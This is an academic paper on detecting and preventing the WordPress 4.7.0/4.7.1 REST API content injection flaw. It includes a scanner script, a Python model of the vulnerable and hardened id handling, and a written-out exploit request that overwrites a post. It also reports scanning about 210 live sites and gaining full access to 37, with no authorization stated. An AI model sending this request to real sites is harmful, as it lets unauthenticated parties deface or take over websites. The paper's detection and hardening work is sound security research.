
Automated Detection of WordPress Content Injection Vulnerability

Md. Maruf Hassan, Touhid Bhuiyan, Saikat Biswas, Md. Hasan Sharif
Daffodil International University, Dhaka, Bangladesh
maruf.swe@diu.edu.bd, t.bhuiyan@daffodilvarsity.edu.bd, saikatbiswas440@gmail.com, hasan543@diu.edu.bd

Abstract: Given the increasing need of clients for web applications, the use of content management systems (CMS) is on the rise. Nowadays, the most popular CMS is WordPress; almost 32% of all CMS-based web applications are built on WordPress. However, a recent study has shown that versions 4.7.0 and 4.7.1 of the WordPress CMS contain a vulnerability called the WordPress content injection vulnerability [1][2]. This paper discusses the WordPress content injection vulnerability, provides a detection system to identify it, and describes preventive techniques that help keep web application users more secure. In our research, we study about 200 WordPress web applications and find most of them to be vulnerable, owing to a default vulnerable page and to outdated versions. To help avoid this vulnerability, we develop a tool that detects the WordPress content injection vulnerability, and we provide preventive techniques.

Keywords: WordPress content injection vulnerability; CMS; detection tools; prevention

I. INTRODUCTION

Nowadays, more than 3.6 billion people across the world use the Internet and different web applications via an array of devices, owing to their usability and easy anywhere, anytime access [3]. In fact, web applications form the first step towards automating day-to-day activities and upgrading existing solutions. As a result, most organizations and service providers in the industrial, banking, government, educational, medical, and other sectors use web applications to provide their services. Although people need to use web applications, there is a high risk of cyber attackers exploiting the weaknesses of these applications. According to OWASP and SANS [4][5], some of the most common vulnerabilities of web applications are SQLi, broken authentication and session management, XSS, CSRF, security misconfiguration, LFI, LFD, unprotected APIs, and buffer overflow.

In recent years, considerable effort has been made to understand and deal with this problem. For instance, organizations such as MITRE, SANS, and OWASP have developed security awareness programmes to help companies deal with the issue. Notwithstanding these efforts, a recent study [6] shows that application developers are still unable to implement effective countermeasures for web application vulnerabilities. The frequent occurrence of web application vulnerabilities may be ascribed to careless coding and a lack of knowledge of cyber security.

To find such vulnerabilities in an automated way, different researchers have proposed scanning or detection tools based on different models. Some studies also compare the effectiveness of various existing tools.

In recent research, the most popular CMS, WordPress, has been found to contain a vulnerability called the WordPress content injection vulnerability. In our study, we develop a detection tool that helps detect this vulnerability. In this paper, we briefly discuss the WordPress content injection vulnerability and its detection techniques, and we provide preventive measures.

This paper is structured into eight sections. Section 2 contains a literature review. Section 3 gives the background of the WordPress content injection vulnerability and its impact on websites. After developing the detection tool, we describe the detection process in Section 4. Using the tool, we collect data and perform data analysis in Section 5. The causes of the content injection vulnerability and the various preventive techniques are provided in Section 6. The conclusion of the research is provided in Section 7. Finally, Section 8 provides an outlook for future research.

II. LITERATURE REVIEW

In our research, we came across several studies on SQLi, XSS, CSRF, RCE, LFI, LFD, code injection, and buffer overflow [7][8][9][10][11]. Some studies proposed models for detecting these vulnerabilities [12][13][14][15][16][17], while others developed scanning or detection tools based on their proposed models [18][19][20][21][22][23][24][25][26][27]. Some researchers also performed analysis-based research on the existing tools [16][28][29]. A few studies dealt with WordPress vulnerabilities [30][31]. However, we did not find any research on the WordPress content injection vulnerability, which is the most recently disclosed of these vulnerabilities. In this paper, our focus is on the WordPress content injection vulnerability, on automated tools for detecting it, and on its preventive techniques.

III. BACKGROUND STUDY

A. What is WordPress Content Injection?

The WordPress content injection vulnerability is a privilege escalation vulnerability that allows an unauthenticated user to modify the content of any post or page on a WordPress site.

B. Why is WordPress Content Injection a Major Vulnerability?

This privilege escalation vulnerability affects the WordPress REST API, whose content endpoints were added to core and enabled by default in WordPress 4.7.0. One of these REST endpoints allows posts to be viewed, edited, deleted, and created via the API. Within this endpoint, a subtle bug allows unauthenticated visitors to edit any post on the site. The REST API is enabled by default on all sites running WordPress 4.7.0 or 4.7.1, so a website built on either of these versions is vulnerable to this bug unless it is updated.
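As an added illustration (this is not the tool built by the authors), the following Python script shows how a scanner can make the decision this section describes: read the version a site advertises, compare it with the affected releases 4.7.0 and 4.7.1, confirm that the posts endpoint of the REST API answers with a post list, and assemble the probe request used in the manual procedure of Section IV. The HTML and JSON responses are constructed samples, the site name is the placeholder used in the paper, and the generator meta tag is the fingerprint assumed here; a site that strips that tag is inconclusive, not safe.

```python
"""Version- and endpoint-based triage for the WordPress 4.7.0/4.7.1 REST API
content injection bug. Added example, not the paper's tool; the responses
below are constructed samples."""
import json
import re
from urllib.parse import urlencode

# The two releases named in the paper; the bug was fixed in 4.7.2.
AFFECTED_VERSIONS = {(4, 7, 0), (4, 7, 1)}

# Assumed fingerprint: the generator meta tag WordPress emits in the page head.
GENERATOR_RE = re.compile(
    r'<meta\s+name=["\']generator["\']\s+content=["\']WordPress\s+([0-9.]+)["\']',
    re.IGNORECASE,
)


def fingerprint_version(html):
    """Return the version advertised in the generator meta tag, or None if absent."""
    match = GENERATOR_RE.search(html)
    return match.group(1) if match else None


def parse_version(version):
    """'4.7' (how 4.7.0 advertises itself) -> (4, 7, 0); '4.7.1' -> (4, 7, 1)."""
    parts = [int(p) for p in version.split(".") if p.isdigit()]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts[:3])


def is_affected_version(version):
    return version is not None and parse_version(version) in AFFECTED_VERSIONS


def exposed_post_ids(rest_body):
    """Post ids listed by /wp-json/wp/v2/posts, or [] if the body is not a JSON post list."""
    try:
        data = json.loads(rest_body)
    except ValueError:
        return []
    if not isinstance(data, list):
        return []
    return [item["id"] for item in data
            if isinstance(item, dict) and isinstance(item.get("id"), int)]


def build_probe(base_url, post_id, marker="testpage"):
    """Assemble the request from the manual procedure: the numeric id in the route,
    the same id with a non-numeric suffix in the query string and in the JSON body."""
    tainted = "%d%s" % (post_id, marker)
    url = "%s/wp-json/wp/v2/posts/%d?%s" % (
        base_url.rstrip("/"), post_id, urlencode({"id": tainted}))
    body = {"id": tainted, "title": "Checking for injection",
            "content": "here is the vulnerable page"}
    return {"method": "POST", "url": url,
            "headers": {"Content-Type": "application/json"}, "body": json.dumps(body)}


def assess(base_url, html, rest_body):
    """Triage one site from its front page and its posts endpoint response.
    Sending the returned probes modifies content: only do that with authorization."""
    version = fingerprint_version(html)
    if version is None:
        return {"version": None, "status": "version not advertised (inconclusive)", "probes": []}
    if not is_affected_version(version):
        return {"version": version, "status": "not affected by version", "probes": []}
    ids = exposed_post_ids(rest_body)
    if not ids:
        return {"version": version, "status": "affected version, posts endpoint not exposed", "probes": []}
    return {"version": version, "status": "likely vulnerable",
            "probes": [build_probe(base_url, post_id) for post_id in ids]}


# Constructed sample responses (not captured from any real site).
SAMPLE_HTML = '<html><head><meta name="generator" content="WordPress 4.7.1" /></head><body></body></html>'
SAMPLE_POSTS = json.dumps([{"id": 5, "slug": "hello-world"}, {"id": 7, "slug": "about"}])

if __name__ == "__main__":
    result = assess("http://SomeWordpressSite.com", SAMPLE_HTML, SAMPLE_POSTS)
    print(result["version"], result["status"])
    for probe in result["probes"]:
        print(probe["method"], probe["url"])
```

The version comparison is deliberately exact rather than "4.7.x or lower": earlier branches do not ship the content endpoints, and 4.7.2 carries the fix, so only the two listed releases are flagged. The probe is built but never sent by this script; a real scan must only send it against sites it is authorized to modify, because a successful probe changes the post.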

C. Impact of WordPress Content Injection Vulnerability

As already mentioned, the WordPress content injection vulnerability is a privilege escalation bug that allows unauthorized users to edit any post or page of a WordPress site. The impact and consequences of a content injection attack can be classified as follows:

1. Confidentiality: Loss of confidentiality is a major problem with WordPress content injection attacks. Since this is a privilege escalation vulnerability, unauthorized persons obtain editing and other privileges that are normally reserved for trusted users.

2. Integrity: A successful WordPress content injection attack allows an external party to make unauthorized modifications, altering or replacing information on the target website.

3. Authorization: Successful exploitation of the WordPress content injection vulnerability allows an attacker to bypass the authorization check on the affected endpoint and act with elevated privileges.

Nowadays, cyberattacks pose a major threat to web applications. The recently disclosed WordPress CMS vulnerability is a kind of injection vulnerability that gives an attacker the privilege to make changes to a web application by editing posts and pages.

IV. WORDPRESS CONTENT INJECTION VULNERABILITY DETECTION

The WordPress CMS has remained popular since 2003. Being open source and user-friendly, it became the most widely used CMS. The security firm Sucuri has listed about 6,143 vulnerabilities from its projects, most of which have been handled and patched by its lab experts. However, this newly disclosed zero-day vulnerability, the content injection vulnerability, is reached through the REST API directly, and in this case it allows privilege escalation as well as content injection: on the affected versions 4.7.0 and 4.7.1, an ordinary unauthenticated user can alter the content of specific posts and pages of the application.

Diagram: 1.0

A. Process of Conducting a Manual Injection

For the general procedure, one first needs to know the CMS version of the web application. If it is one of the affected versions, the vulnerable content page must be searched for:

    http://SomeWordpressSite.com/index.php/wp-json/wp/v2/posts/5

If such a post is found on the site, it can be injected by any regular (unauthenticated) user. On our vulnerable page the endpoint returns the raw JSON below, which the browser shows as an error or broken HTML page (excerpt as captured):

    [{"id":123907,"date":"2017-03-29T13:52:56","date_gmt":"2017-03-29T20:52:56","guid":{"rendered":"https:\/\/www.demosite.com\/?p=123907"},"modified":"2017-03-29T13:53:12","modified_gmt":"2017-03-29T20:53:12","slug":"yubihsm-2-open-beta-

The REST API prioritizes $_GET and $_POST values over the ones captured by the route's regular expression, which makes it possible for an attacker to send a request like /wp-json/wp/v2/posts/5?id=5testpage. WordPress then looks the post up through the get_instance() static method of WP_Post, which rejects a non-numeric id such as 5testpage. The permission check therefore finds no post to authorize against and passes, while the update code casts the id to an integer (5) and edits that post.

To conduct the injection, one sends an HTTP POST to that post id with the following JSON body:

    {"id" : "5Test", "title" : "Checking for injection", "content" : "here is the vulnerable page"}

With the REST API already enabled in the vulnerable version, our request is executed and the injected content appears at the vulnerable URL. Depending on how the site processes post content, this might also lead to remote code execution (RCE) or JavaScript injection on the server, and the server can be fully compromised if a web shell is executed. Our tool obtains the responses from the web APIs of the target sites, and if a response comes from one of the affected versions, the tool searches for the vulnerable pages that might lead to an injection.
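To make the id handling described above concrete, here is an added Python model of the vulnerable permission check next to a hardened one. It is the editor's illustration, not WordPress code and not the text of the 4.7.2 patch: the post store, the request class and the function names are the example's own, and the PHP behaviours it imitates (is_numeric() refusing "5testpage", (int) "5testpage" giving 5, query-string and body parameters taking priority over the route capture) are reproduced by small helper functions. The request it replays is the one from the manual procedure: route id 5, query string id=5testpage, and the JSON body shown above.

```python
"""Model of the id-handling bug behind the WordPress 4.7.0/4.7.1 REST content
injection, beside a hardened variant. Added example in Python; it is not
WordPress code. Store, request class and function names are the example's own."""
import re


def new_store():
    """Constructed sample post table (id -> fields); not data from any real site."""
    return {5: {"title": "Hello world", "content": "original content"}}


def php_is_numeric(value):
    """Approximation of PHP is_numeric() on a string: sign, digits, optional fraction."""
    return re.fullmatch(r"\s*[+-]?(\d+(\.\d*)?|\.\d+)", str(value)) is not None


def php_int_cast(value):
    """Approximation of PHP (int) on a string: the leading integer prefix, else 0."""
    match = re.match(r"\s*([+-]?\d+)", str(value))
    return int(match.group(1)) if match else 0


def get_instance(store, post_id):
    """Mirrors the is_numeric() guard of WP_Post::get_instance(): a non-numeric
    id such as "5testpage" resolves to no post at all."""
    if not php_is_numeric(post_id):
        return None
    number = float(post_id)
    if number != int(number) or not number:
        return None
    return store.get(int(number))


class Request:
    """A REST request whose id is captured by the route regex /posts/(?P<id>[0-9]+)
    but can also be supplied in the query string or the JSON body."""

    def __init__(self, route_id, query=None, body=None):
        self.route = {"id": route_id}
        self.query = query or {}
        self.body = body or {}

    def param(self, name):
        # Lookup order of the affected versions: body and query string win over the route capture.
        for source in (self.body, self.query, self.route):
            if name in source:
                return source[name]
        return None


def vulnerable_update_item(store, request, user_can_edit):
    """4.7.0/4.7.1 style: the permission check and the update resolve the id differently."""
    post = get_instance(store, request.param("id"))
    if post is not None and not user_can_edit(post):
        return "403 rest_cannot_edit"
    # "5testpage" resolved to no post above, so the check fell through to "allowed".
    post_id = php_int_cast(request.param("id"))  # (int) "5testpage" == 5
    post = store.get(post_id)
    if post is None:
        return "404 rest_post_invalid_id"
    for field in ("title", "content"):
        if field in request.body:
            post[field] = request.body[field]
    return "200 updated post %d" % post_id


def hardened_update_item(store, request, user_can_edit):
    """Hardened variant: one strictly validated id, resolved once, failing closed.
    This is the example's own fix, not the text of the WordPress 4.7.2 patch."""
    raw = request.param("id")
    if not re.fullmatch(r"\d+", str(raw)):
        return "400 rest_invalid_param"
    post_id = int(raw)
    post = store.get(post_id)
    if post is None:
        return "404 rest_post_invalid_id"
    if not user_can_edit(post):
        return "403 rest_cannot_edit"
    for field in ("title", "content"):
        if field in request.body:
            post[field] = request.body[field]
    return "200 updated post %d" % post_id


def anonymous_can_edit(post):
    """An unauthenticated visitor may edit nothing."""
    return False


def injection_request():
    """The request from the manual procedure: /wp-json/wp/v2/posts/5?id=5testpage plus the JSON body."""
    return Request(route_id="5", query={"id": "5testpage"},
                   body={"id": "5Test", "title": "Checking for injection",
                         "content": "here is the vulnerable page"})


if __name__ == "__main__":
    store = new_store()
    print("vulnerable:", vulnerable_update_item(store, injection_request(), anonymous_can_edit), store[5])
    store = new_store()
    print("hardened:  ", hardened_update_item(store, injection_request(), anonymous_can_edit), store[5])
```

The property that matters in the hardened variant is that the permission check and the write operate on the same, already validated post: an id that cannot be resolved is an error, never an implicit "allowed". A request with a clean numeric id from an anonymous user is denied by both variants; only the tainted id distinguishes them.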
V. RESULT ANALYSIS

A. Result-based Analysis

According to Graph 01, of the investigated WordPress web applications, 177 were vulnerable while 33 were not vulnerable (210 sites in total, consistent with the "more than 200" scanned in Section VII). This shows that a large number of WordPress websites still contain this injection vulnerability.

Graph 01: WordPress content injection vulnerability found and not found

B. Version-based Analysis

In our analysis, we found that 106 of the vulnerable websites ran WordPress version 4.7.0 and 71 ran version 4.7.1. This is the result we obtained from our data set, but the ratio can vary in other cases. Therefore, proper measures have to be taken to be safe from this vulnerability.

Graph 02: Version-based vulnerability

C. Analysis Based on the Level of Risk Created by the WordPress Content Injection Vulnerability

The risk level is understood as the impact of compromising critical information that could be retrieved from the websites owing to the WordPress content injection vulnerability. We have categorized the risk into four levels: critical, high, medium, and low. The statistics for the risk levels are shown in Graph 03. Based on our data set, 31% of the sites are considered critical, since the intruder can get full control of the host server and the admin panel of the web application. As many as 46% of the websites are marked as high-risk sites, which can be exploited easily by an outsider, causing serious harm to the host server. In this review, 15% and 8% of the sites are considered medium and low risk, respectively, in terms of the risk of being exploited through the WordPress content injection vulnerability.

Graph 03: Levels of risk caused by WordPress content injection vulnerability

D. Access-based Result

We found 140 vulnerable websites on which access was limited to a specific page or post. On the other hand, we were able to get full access on 37 web applications.

Graph: Access-based analysis

VI. PREVENTION TECHNIQUES

Every WordPress installation periodically contacts the WordPress.org update server to check for plugin, theme, or core updates; this is the general protection against newly disclosed vulnerabilities. The response from this server contains information about any newer versions that may be available, including whether the plugin, theme, or core should be updated automatically, together with a URL from which the updated software is downloaded and installed. Where this update is not possible, developers must stop unauthenticated users from creating or modifying pages and posts through the REST API: remove or disable the default vulnerable endpoint so that such requests are rejected instead of being executed on the server.

VII. CONCLUSION

In our research, we scanned more than 200 WordPress CMS 4.7.0 and 4.7.1 web applications from across the world. We found that the WordPress content injection vulnerability is common for these two versions. In most cases, this vulnerability occurs at the default wp-json/wp/v2/posts endpoint. The WordPress content injection vulnerability is a privilege escalation that allows an unauthorized user to modify the content of any post or page on a WordPress site. Thus, proper preventive measures should be taken to forestall this vulnerability. The first measure is updating the WordPress version. However, if updating is not possible, it is recommended to delete the default vulnerable page.

VIII. FUTURE WORK

1. We will enhance the detection tool by adding more features, such as detection of SQLi, XSS, RCE, and broken authentication.

REFERENCES

[1] Statistics for websites using CMS technologies, 2017 [online]. Available: https://trends.builtwith.com/cms, accessed 14 April 2017.
[2] Content Injection Vulnerability in WordPress, 2017 [online]. Available: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html, accessed 13 April 2017.
[3] Internet users in the world, 2017 [online]. Available: http://www.internetlivestats.com/internet-users/, accessed 12 April 2017.
[4] OWASP top ten vulnerability list, 2017 [online]. Available: https://www.sans.org/top25-software-errors/, accessed 14 April 2017.
[5] CWE/SANS Top 25 Dangerous Software Errors, 2017 [online]. Available: https://www.sans.org/top25-software-errors/, accessed 12 April 2017.
[6] CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection'), 2017 [online]. Available: http://cwe.mitre.org/data/definitions/89.html, accessed 14 April 2017.
[7] N. I. Daud, K. A. A. Bakar and M. S. M. Hasan, "A case study on web application vulnerability scanning tools," 2014 Science and Information Conference, London, 2014, pp. 595-600.
[8] H. Shahriar and M. Zulkernine, "Client-Side Detection of Cross-Site Request Forgery Attacks," 2010 IEEE 21st International Symposium on Software Reliability Engineering, San Jose, CA, 2010, pp. 358-367.
[9] T. Farah, M. Shojol, M. Hassan and D. Alam, "Assessment of vulnerabilities of web applications of Bangladesh: A case study of XSS & CSRF," 2016 Sixth International Conference on Digital Information and Communication Technology and its Applications (DICTAP), Konya, 2016, pp. 74-78.
[10] D. Alam, M. A. Kabir, T. Bhuiyan and T. Farah, "A Case Study of SQL Injection Vulnerabilities Assessment of .bd Domain Web Applications," 2015 Fourth International Conference on Cyber Security, Cyber Warfare, and Digital Forensic (CyberSec), Jakarta, Indonesia, 2015, pp. 73-77.
[11] T. Farah, D. Alam, M. N. B. Ali and M. A. Kabir, "Investigation of Bangladesh region based web applications: A case study of 64 based, local, and global SQLi vulnerability," 2015 IEEE International WIE Conference on Electrical and Computer Engineering (WIECON-ECE), Dhaka, 2015, pp. 177-180.
[12] D. Huluka and O. Popov, "Root Cause Analysis of Session Management and Broken Authentication," World Congress on Internet Security (WorldCIS-2012), 2012.
[13] V. M. Nadar, M. Chattergee and L. Jacob, "Detection Model for CSRF and Broken Authentication and Session Management Attack," International Journal of Computer Science and Information Technologies, Vol. 7(4), 2016, pp. 1801-1804.
[14] L. Dukes, X. Yuan and F. Akowuah, "A case study on web application security testing with tools and manual testing," 2013 Proceedings of IEEE Southeastcon, Jacksonville, FL, 2013, pp. 1-6.
[15] D. Gol and N. Shah, "Detection of web application vulnerability based on RUP model," 2015 National Conference on Recent Advances in Electronics & Computer Engineering (RAECE), Roorkee, 2015, pp. 96-100.
[16] A. Tajpour and M. J. z. Shooshtari, "Evaluation of SQL Injection Detection and Prevention Techniques," 2010 2nd International Conference on Computational Intelligence, Communication Systems and Networks, Liverpool, 2010, pp. 216-221.
[17] H. Shahriar and M. Zulkernine, "Client-Side Detection of Cross-Site Request Forgery Attacks," 2010 IEEE 21st International Symposium on Software Reliability Engineering, San Jose, CA, 2010, pp. 358-367.
[18] K. Bhargavan, A. D. Lavaud, C. Fournet, A. Pironti and P. Y. Strub, "Triple Handshakes and Cookie Cutters: Breaking and Fixing Authentication over TLS," 2014 IEEE Symposium on Security and Privacy, San Jose, CA, 2014, pp. 98-113.
[19] Q. Zhang, H. Chen and J. Sun, "An execution-flow based method for detecting Cross-site Scripting attacks," The 2nd International Conference on Software Engineering and Data Mining, Chengdu, China, 2010, pp. 160-165.
[20] G. Agosta, A. Barenghi, A. Parata and G. Pelosi, "Automated Security Analysis of Dynamic Web Applications through Symbolic Code Execution," 2012 Ninth International Conference on Information Technology - New Generations, Las Vegas, NV, 2012, pp. 189-194.
[21] Zhushou Tang, Haojin Zhu, Zhenfu Cao and Shuai Zhao, "L-WMxD: Lexical based Webmail XSS Discoverer," 2011 IEEE Conference on Computer Communications Workshops (INFOCOM WKSHPS), Shanghai, 2011, pp. 976-981.
[22] N. Antunes and M. Vieira, "Benchmarking Vulnerability Detection Tools for Web Services," 2010 IEEE International Conference on Web Services, Miami, FL, 2010, pp. 203-210.
[23] E. Galán, A. Alcaide, A. Orfila and J. Blasco, "A multi-agent scanner to detect stored-XSS vulnerabilities," 2010 International Conference for Internet Technology and Secured Transactions, London, 2010, pp. 1-6.
[24] J. Bau, E. Bursztein, D. Gupta and J. Mitchell, "State of the Art: Automated Black-Box Web Application Vulnerability Testing," 2010 IEEE Symposium on Security and Privacy, Oakland, CA, USA, 2010, pp. 332-345.
[25] B. Delamore and R. K. L. Ko, "Escrow: A Large-Scale Web Vulnerability Assessment Tool," 2014 IEEE 13th International Conference on Trust, Security and Privacy in Computing and Communications, Beijing, 2014, pp. 983-988.
[26] B. Eshete, A. Villafiorita and K. Weldemariam, "Early Detection of Security Misconfiguration Vulnerabilities in Web Applications," 2011 Sixth International Conference on Availability, Reliability and Security, Vienna, 2011, pp. 169-174.
[27] Z. Djuric, "A black-box testing tool for detecting SQL injection vulnerabilities," 2013 Second International Conference on Informatics & Applications (ICIA), Lodz, 2013, pp. 216-221.
[28] R. Johari and P. Sharma, "A Survey on Web Application Vulnerabilities (SQLIA, XSS) Exploitation and Security Engine for SQL Injection," 2012 International Conference on Communication Systems and Network Technologies, Rajkot, 2012, pp. 453-458.
[29] Atefeh Tajpour, Mohammad Zaman Heydari, Maslin Masrom and Suhaimi Ibrahim, "SQL injection detection and prevention tools assessment," 3rd International Conference on Computer Science and Information Technology, Chengdu, 2010, pp. 518-522.
[30] T. Koskinen, P. Ihantola and V. Karavirta, "Quality of WordPress Plug-Ins: An Overview of Security and User Ratings," 2012 International Conference on Privacy, Security, Risk and Trust and 2012 International Conference on Social Computing, Amsterdam, 2012, pp. 834-837.
[31] A. P. Felt et al., "Diesel: applying privilege separation to database access," Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security, ACM, 2011.